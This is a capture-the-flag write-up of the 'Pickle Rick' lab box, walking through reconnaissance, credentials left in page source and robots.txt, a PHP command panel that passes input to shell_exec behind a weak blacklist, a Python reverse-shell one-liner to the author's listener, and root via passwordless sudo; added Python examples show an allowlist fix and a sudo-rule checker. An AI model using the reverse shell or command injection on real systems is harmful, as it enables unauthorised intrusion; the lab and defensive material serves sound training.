CTF-WriteUps

Writeups are the easiest way to showcase your approach to a solution. This repo is all about the writeups I write while playing CTFs.


Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

So I began with an nmap scan; ports 22 and 80 are open.

$ sudo nmap -T4 -sC -sS 10.10.51.178 >nmap.out

Let's visit the website on port 80. Nothing interesting at first glance, but after inspecting the source code there was a comment with something useful: Username: R1ckRul3s. Since it's a website, it's worth checking the robots.txt file; oddly, it contains a random string, Wubbalubbadubdub. Since the page mentioned something about a login, there is a good chance of a login page of some sort on the website, so let's check for login.php, and there it is. I first tried to brute-force it with the username obtained earlier, but after some time I recalled the odd text in robots.txt. With that as the password, we are in!

We have a Command Panel which reveals some interesting files, but we can't read them with cat. So next I tried grep -r ., which displays the contents of everything in the directory. Looking around, I found the first ingredient: Sup3rS3cretPickl3Ingred.txt:mr. meeseek hair

While looking further I found the list of blacklisted commands.

<?php
function contains($str, array $arr)
{
    foreach ($arr as $a) {
        if (stripos($str, $a) !== false) return true;
    }
    return false;
}
// Can't use cat
$cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
if (isset($_POST["command"])) {
    if (contains($_POST["command"], $cmds)) {
        echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
    } else {
        $output = shell_exec($_POST["command"]);
        echo "</br><pre>$output</pre>";
    }
}
?>
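The filter above is a case-insensitive substring blacklist wrapped around shell_exec, which is why a reader that is not on the list (the grep used earlier) goes straight through, while harmless words that happen to contain "cat" are blocked. The following is an added example, not code from the box or from the challenge author: it reproduces the blacklist logic in Python next to the allowlist-plus-argv design a hardened panel would use, where only named programs run, their arguments are validated, and nothing is ever handed to a shell. The ALLOWED table, _safe_path and the other function names are assumptions made for the illustration.

```python
import shlex
import subprocess

# The panel's original check, reproduced for comparison: a case-insensitive
# substring match (PHP stripos) against a short list of file readers.
BLACKLIST = ("cat", "head", "more", "tail", "nano", "vim", "vi")


def blocked_by_blacklist(command: str) -> bool:
    lowered = command.lower()
    return any(word in lowered for word in BLACKLIST)


def _safe_path(arg: str) -> bool:
    """A bare file name inside the working directory: no slashes, no '..'."""
    return bool(arg) and "/" not in arg and ".." not in arg and not arg.startswith("-")


# Allowlist alternative (assumed set for this example): the only programs the
# panel may launch, each paired with a validator for its argument list.
# Anything not listed here is rejected before any process is created.
ALLOWED = {
    "ls": lambda args: all(a.startswith("-") or _safe_path(a) for a in args),
    "whoami": lambda args: args == [],
    "id": lambda args: args == [],
}


def check_allowlist(command: str):
    """Return (ok, argv). argv is an exec-style vector, never a shell string."""
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes etc.
        return False, []
    if not argv or argv[0] not in ALLOWED:
        return False, []
    if not ALLOWED[argv[0]](argv[1:]):
        return False, []
    return True, argv


def run_allowlisted(command: str) -> str:
    ok, argv = check_allowlist(command)
    if not ok:
        return "Command disabled"
    # argv is passed directly to execve: ';', '$(...)' and '|' are ordinary
    # characters in a file name here, not shell syntax.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    for cmd in ("cat clue.txt", "locate clue.txt", "grep -r . .", "ls -la", "ls ../etc"):
        print(f"{cmd!r:22} blacklist blocks: {blocked_by_blacklist(cmd)!s:5} "
              f"allowlist accepts: {check_allowlist(cmd)[0]}")
```

The interesting rows are "locate clue.txt", which the blacklist rejects only because "cat" appears inside "locate", and "grep -r . .", which it accepts because grep was never listed; the allowlist judges by the program actually named in argv[0], so neither string-matching problem exists.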

Then I found a base64 string which turned out to be a rabbit hole. Classic!

So I went back to the Command Panel and decided to get a reverse shell; the best options were one-liners.

I had already confirmed that python was present on the target, so I took a Python one-liner from the Pentest Monkey Reverse Shell Cheat Sheet.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.155.126",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a listener on our machine.

 $ nc -nlvp 8000

We have a shell; stabilize it with

 python3 -c 'import pty;pty.spawn("/bin/bash")'

And the second ingredient was found:

www-data@ip-10-10-60-162:/home/rick$ cat second\ ingredients           
cat second\ ingredients
1 jerry tear

After this I checked sudo permissions and found that www-data can run any command as root without a password.

www-data@ip-10-10-60-162:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on
    ip-10-10-60-162.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-60-162.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
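The `(ALL) NOPASSWD: ALL` entry is the whole privilege escalation: the web server's account can become root without a password. A hardening or triage script should flag that configuration automatically. The following is an added example, not code from the box or the challenge: a small Python parser for `sudo -l` output that extracts each rule and reports unrestricted `ALL` rules, using a constructed copy of the output above as sample input. The function names and the severity labels are assumptions for the illustration.

```python
import re

# Constructed sample: a copy of the sudo -l output shown in the writeup.
SAMPLE = r"""Matching Defaults entries for www-data on
    ip-10-10-60-162.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-60-162.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
"""

# Constructed sample of a tightly scoped configuration for contrast.
SAMPLE_SCOPED = """User alice may run the following commands on webhost:
    (root) /usr/bin/less /var/log/syslog
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

# A rule line: "(runas[:group]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)


def parse_sudo_l(text: str):
    """Return one dict per rule line: runas, nopasswd flag, command list."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # Rules start after the "User X may run the following commands" header;
        # the Defaults block before it is ignored.
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue        # host continuation line or blank
        tags = m.group("tags").split()
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in tags,
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def findings(text: str):
    """Flag rules that grant every command as root or as any user."""
    out = []
    for rule in parse_sudo_l(text):
        runas_user = rule["runas"].split(":")[0].strip()
        if "ALL" in rule["commands"] and runas_user in ("ALL", "root"):
            severity = "CRITICAL" if rule["nopasswd"] else "HIGH"
            suffix = " without a password" if rule["nopasswd"] else ""
            out.append(f"{severity}: unrestricted sudo as {rule['runas']}{suffix}")
    return out


if __name__ == "__main__":
    for name, text in (("www-data", SAMPLE), ("alice", SAMPLE_SCOPED)):
        print(name, findings(text) or ["no unrestricted rules"])
```

Run against the sample from the box it reports a single CRITICAL finding; the scoped sample, where even the NOPASSWD rule is limited to one fixed command line, produces none.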

So sudo to root and cat out the final ingredient from the file.

root@ip-10-10-60-162:~# ls
ls
3rd.txt  snap
root@ip-10-10-60-162:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice

With that we have root on Pickle Rick!!